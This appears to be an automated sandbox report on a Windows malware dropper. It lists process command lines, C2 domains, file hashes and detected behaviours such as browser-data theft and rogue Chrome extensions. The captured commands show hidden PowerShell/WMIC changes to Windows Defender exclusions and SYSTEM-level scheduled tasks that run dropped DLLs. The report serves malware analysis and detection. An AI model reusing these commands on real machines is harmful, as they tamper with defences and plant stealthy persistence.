forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\zkIMIO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\WchfhUg.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ucrVpivlTlXwlAC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\bifBtEe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\GIsfsbD.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\FMMsqqA.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\ViiciBn.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 00:30:14 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll\",#1 /PONsdidJpV 385121" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll",#1 /PONsdidJpV 385121

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll",#1 /PONsdidJpV 385121

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 604

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 1512

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 api2.check-data.xyz udp
US 44.235.180.78:80 api2.check-data.xyz tcp

Files

\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe

MD5 27ac45acebe576d24f84ca8dadc355c3
SHA1 6640bf3cfa9d0610f3150d45a52f88145c4799e2
SHA256 32e6e4acc8ea46841ad65af928c7aff9fcc1224cb5f6ba557c30f8133a440b7a
SHA512 29fc5116e32bc12a8f386ee824bd6d44824acc1c22cb4c8856fbc8e9076e12d24d77d3fd85294d5adc2ff199f8b11dcf3ecb6e3ea3d8cb65d8accf0f46e60b2e

\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe

MD5 a5dca05edc6eda6e2acfe7ca41641cc5
SHA1 b772813e63a424ae31a2bd75c0067be03aae0165
SHA256 986e2f087fe32332daf7215461a103fa25d86209ab704e29a81dc419435367ae
SHA512 c3d865918176c064e638d2c892cb2ef45bc722fa9f3b4e1fb10ca6886054ff2d37cd9fd97fff08cdd95a017374109495bf48069fdc67355b34729fae654da2ed

memory/2544-25-0x0000000010000000-0x00000000105CF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 7654ff1caff5ec9d4c19d467cd4cd633
SHA1 ee59e801b8c90220e99401ecbc4ab4456803b19a
SHA256 d018b6276c4b5138b11ef3b7c3075778a12f3dc9990c13fc6ab439487e69f93f
SHA512 19da2348c3b161d7064e25cd9442c08f940200d063a9d07f022919b0b442472e56e250bb673c83369a868b19fa5f856874e1d41287923c73f36c3c94dcbeb55c

memory/2272-37-0x0000000010000000-0x00000000105CF000-memory.dmp

memory/980-45-0x000000001B370000-0x000000001B652000-memory.dmp

memory/980-46-0x00000000025A0000-0x00000000025A8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 547820f73a6c52215af61d6a7c1d74d8
SHA1 bf89072ce6a9692dab17c6da46666ad25e4cb585
SHA256 4b6cd3f4fada788eb2e823003fb7165f9a8ba7bd22854fed4e4dd3dd11a7635a
SHA512 98c46085c3222f967a232bf6cc2e4acd049f1a71daf847fa608990c7dc063eb2831129ba3c9657edb1c2054d384069c0e201c6dcb3a4107845718a38fcae94ed

memory/2292-55-0x000000001B360000-0x000000001B642000-memory.dmp

memory/2292-56-0x00000000025A0000-0x00000000025A8000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\Temp\QqEAMUespgTHJnVz\GQDRcsXT\PMxFzlNWEeKxTYtk.wsf

MD5 e3b6fce460d4376c66ddf888dceb2bd0
SHA1 a9a54f824d581b6c42c828937222698eadae464d
SHA256 a399a8eeac6a0414067798e74d5446bc0a6fed60d379d6f72351d9ecb51431f7
SHA512 9bb0e8ff4f3b4657c9f77d185ebe0bcb22e116c41fe99cba79b93e1a1a7528a322c3e77235bde7eef7f34b22c1b55d5bd11fe36cd47d3d8bab566136ff551f1e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 cc3031eca18185de7031b4e4704470a2
SHA1 70f5ee74dfb470ec4aafd87990d9035b3c388b09
SHA256 26961dc83850f4168490d18d2bfae483d92bfac9a12ff3c46d94215537b79776
SHA512 3090f0adaa099c3b50e806bccf0030ad85d3be0bae97999df651ffb6f5365ac970da7e161e3a0ad0cee293dacb14e0034bb13128d24a4f0a6dec541286dda694

memory/2028-76-0x0000000010000000-0x00000000105CF000-memory.dmp

memory/2028-86-0x0000000001F20000-0x0000000001FA5000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 c14f91d92ce590f19e4c8f861c4ac94a
SHA1 397853b82bf5ec920fdeec336708999d8eef4bd2
SHA256 f796f4e5408a2ab68d57c08a5353d0692a65f69f98dd66e7424c5d0f3ef0234c
SHA512 754f4935176c53c07b927ecc5cf3e2a9ef86218aedd2e017258b2464324d3b50b26ca670cc073f51a388ef078298b92a56e250acfee45608770e5d074fd5f1bb

memory/2028-120-0x0000000001FB0000-0x000000000200D000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 bf1f631d5d6e9168c9e69deb988eeabe
SHA1 54a1cc608061f3c9b117f3baaf0e09cedb12b45a
SHA256 dbd6846ee4d005d54fc33705ae63914a1b7d08f5e1a9a6ed2bbbda0e36af5188
SHA512 7610bb27af030ced451aa5107808448fa5d38979e4a198abd12e959daa9c351daa4c0e919d9c356471415ce5392c5a61e000ffdb2bd9ad7c8b7b507b2aea8cfc

C:\Program Files (x86)\hsUwQAlMU\WchfhUg.xml

MD5 42e158f1794e055e944693c96438761e
SHA1 0ffdc336985d804ac9195051581237e1219de0bd
SHA256 3b84f7818d8c5f7ea7ee36fc3c05896eed56922c13f88e959553176db6a64597
SHA512 cc39dbdb60cd3171ac6aa216fe31efdd31553c32fa87f61e2371f7e57a886cb43a85b8e6ffc1770a8d8430280641c83f3062fb61284e0315423e72486bb5d416

C:\Program Files (x86)\dlfHiRefefjU2\bifBtEe.xml

MD5 a0ca83890132697bd1c6cd05b9c00a37
SHA1 520ff6ee5d7569a1685d2a9a2afb8b158776a6d0
SHA256 ed27262ef62c4c740bee54b35dfe2878e1ff82f863e9611723d304eb9aead68d
SHA512 e98f5db6e2461aa7e257d01fd5018c55b5db2d3a2991fe4943ff867b2bd1ecd40bd003e5c37c923633a8f5e4060daed5125a8106eed9f3a28949c468fae86a46

C:\ProgramData\nivjmgppGaMJQQVB\GIsfsbD.xml

MD5 617d79daf144345bbad41a988cf4e7dd
SHA1 3261de16057471554d3358190f774e41cc1cba67
SHA256 ca6100d84417365828151234c7411b88b11eeb06e89ef5a89e84246845c874bc
SHA512 34bfa4d3a509fda4db90bbfbf53bf3ab770be8649c1cf492c830f6def96455c2e849b105330bc3928d5f70204cd57c4a2f9f1a14688e44d8c0ecf458142809d0

C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\FMMsqqA.xml

MD5 f288dc1e08bdf4ec07e528d58555edf1
SHA1 7ea87411edcb6fd7a424755fd42db2186db60bb1
SHA256 da84e35fe3cfa690d188e8ad090a3cc43b9a6713808e59fee6c25d7b716475b0
SHA512 5f9f1a512879b977bad1d9803d14d2d790e2a4631637de023e5bb2c62e371c5b95ba934dad27a93c56035b4f8a5a2a2ad0f972925cd0949cd8f85e87bf843b04

C:\Program Files (x86)\QtKEgKYoTGTqC\ViiciBn.xml

MD5 ccdaeb115ffc2bbb649a56839557ea3a
SHA1 bd5c86877f06d8b1664d5536f0badd57336e0feb
SHA256 bbd5df6b642176d94c850a0ae73a2b7a84203c1d4f1e3e8a515b949965c905c4
SHA512 4bad6bececf64de9ff596afa56d1425adf1df055fdf1c3289e43f4a49a5a959d254291237c88f6a323dcd6365f65c1dacf65f03da8c49a6ddde3bc76b08e183f

C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll

MD5 21e3965bd08eabf0ee24dd9d17dc0d5c
SHA1 8680d90f50ed3caf0b617a1cf512c664bdbd7be8
SHA256 570e0b2d996c3151a08c5042555500988b7eca34c2126d335e06da13ce772f4a
SHA512 9b5662e11db22c04c3f4463e493c28b5ef2a7a997e644a6cad8f38d8df2947f8f14b049d0d2136b4e98a53db9db94c5a2ff613b8cdbaa2c7107a46f855c81a3e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gdoevwuq.default-release\prefs.js

MD5 641cd4cda9e6a63d6ff49466f169bb4f
SHA1 d9dea45401d931e44569f7586249bc6b687575d3
SHA256 bdf0733822df0cefd3b0f726fdb993e450601829168cf9bbc41f8ad51896bf12
SHA512 0387891b53dccc6ba2c53e7c92c9bd04a3b9a438c57cc2571de6abdc2b1110434a08731f697421d40b46743c6c0c266b208233fb170953fb2d100b4bf7f8440e

memory/2028-302-0x0000000002750000-0x00000000027D2000-memory.dmp

memory/2028-312-0x00000000027E0000-0x00000000028BA000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 589160343c77df22b0e9d1a4781cc29e
SHA1 e2fca682f9f68824d6e1a9e5e7e953958547c9dd
SHA256 f47cfc5c5fdf82ee3966800caf84d1bdf651d00cd9fcd867712f44b7437bcf33
SHA512 c3bfd58ec08509dda63817c5e1e2a040e5edb73b87438f5529177f1f8dec3212da1b70bfd4972c1631a5f17b907b65ce4a59ce9c4f989ac31bbaa5dcddeb49db

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 875531fe10c3322910f6851b7f374b55
SHA1 3b5db893f6b4cc708560ba54cb16d285e862e415
SHA256 ab676e3c0f603607e1b784bd5f3216bda0e7672ba85ae36398857250555f6dc2
SHA512 2cad9f31b7e0333a9953b940271081ab3c3fcbd9e4275f9a765d3300950bd1ef809ec732bb02a17d4a81a60755411fd338cfd328db0ac67ef3755441f02328a6

memory/1140-335-0x0000000001320000-0x00000000018EF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe

MD5 b7d84c9b4b1f54c4281635c6cf5f043a
SHA1 07f87951b0d07aa414ea172a9263dd419a11df06
SHA256 c69bf83e7be450b7eafc421d48fd660e02d6c1863a74219dc8189cdf021938e6
SHA512 2eb52baa625b84cab4f2c5bbd7558407a6c1a4bc56858e236b18b8bd136fdcef574e8533c795d1dfa803b04a7f166c8cce4de4a371ef5fd353722c4e2d9f4dc7

\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe

MD5 b7f60886caac610e0a33874d14783422
SHA1 396e1f2d10859f455b88a2a58049ee141e58131b
SHA256 c1d48fdee6bbba8868b7646d3a9aa0b56b3ecb5dbe1590face930556962fe002
SHA512 2db502593deedac807fa5a29add994e538f37d6227eb392c090900264a9b204d21d51f75d8daad4d13395f35a6f8bd151c7623d1ef958769736ab38613af4ac5

\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe

MD5 11acc1cb9f304bd46eeadbf472741a63
SHA1 db516b2f08a296f8c34a5ad02d27e8866dd41e4d
SHA256 4f4e9212565492bd903a9ebc3d39f91b9207aaca90fb7a4fdb60036774cfb5f0
SHA512 fa9f98e4e2ea8273b7203fb6527a85fae77e98f7710690a168dfdd7540e3848935362e723caae44bd5394d68b4b4a7049dbb01d3fb54affb975bb080e47c21c4

\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe

MD5 74dbf9e5834d3da89dd347a5408191e9
SHA1 a07e63c65aa8f09c2f73b3127f854587c8a64f5d
SHA256 169394a2f7d6f35dd69f21c377af0db4500d822660124269fdf057b5444a2c0e
SHA512 70b8f2c8e4188364eea68cb6e760aef8e5379c411ba6c9129626b102ae18ed5426b9a5a9f059613f3ffcc585908a71e0b404dfd4c7e92f63b4f085ae4649cf1c

\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe

MD5 4188b0408ab2ea513e384ff208c8a36f
SHA1 055664b11af71f509a1d585e07444712e4a78e87
SHA256 25d8d6a9cea11a5fc7e9d3f479ae9f217883205082ebb0d181fab3da4c81ce39
SHA512 1cca0c2a5bf3c411b86ccebbce3a2500211ea908fd2d3952d27316f98b6e8581d60f7710296c801502bed97c7a6e11c61455ca44b820b36f37fb9a926b72c7ec

\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe

MD5 1d1f53f1e4c60f27a035bc01b0ec3e9b
SHA1 9d53a075f9188dffd0b7f159fa0267946a020620
SHA256 2a210ebb05c73815fec934160a1e2de3c75c90740ff4c7ee168049f5149b4bee
SHA512 84f1fe2da06e5a14d6795465dba63ce6185196a57faccba8293d8a68dc88e488aa704509489904b182195d08021f70f1905a5a640a191ba6bc6f38a7ed28da58

\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe

MD5 f9a669b865444c461827860cddf15505
SHA1 7a08728e290422ab1c1201c83279d23dfdf1ac23
SHA256 c7d7ac81c114ec5e62a7eac5b3b63e29ec864f3b60de3d8dc02059a297d78d79
SHA512 d7ec3d96832452405c78b02367f4882f5dea5c8891a75748945c535c6dd25cdfb5b208c87cbb1056e55cc760be17ebc681da2233eedf4b70de54a51104bc39b7

\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe

MD5 6a276b1f5c6abaccef735c84b622e420
SHA1 8419fc313d239942658feae1360d5e25787459b0
SHA256 353145f6f6b29f71f6886351303ac2fb560ab2f81397d3f9618475531998976c
SHA512 cd44c5bd69243551f781578fb911bd34ad142d60b55f279179c3fdd1c0612321de7f11ece6088b220a54749be326e20e033ab2a54551673500d61b01bd523df8

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-02 01:02

Reported

2024-06-02 01:05

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
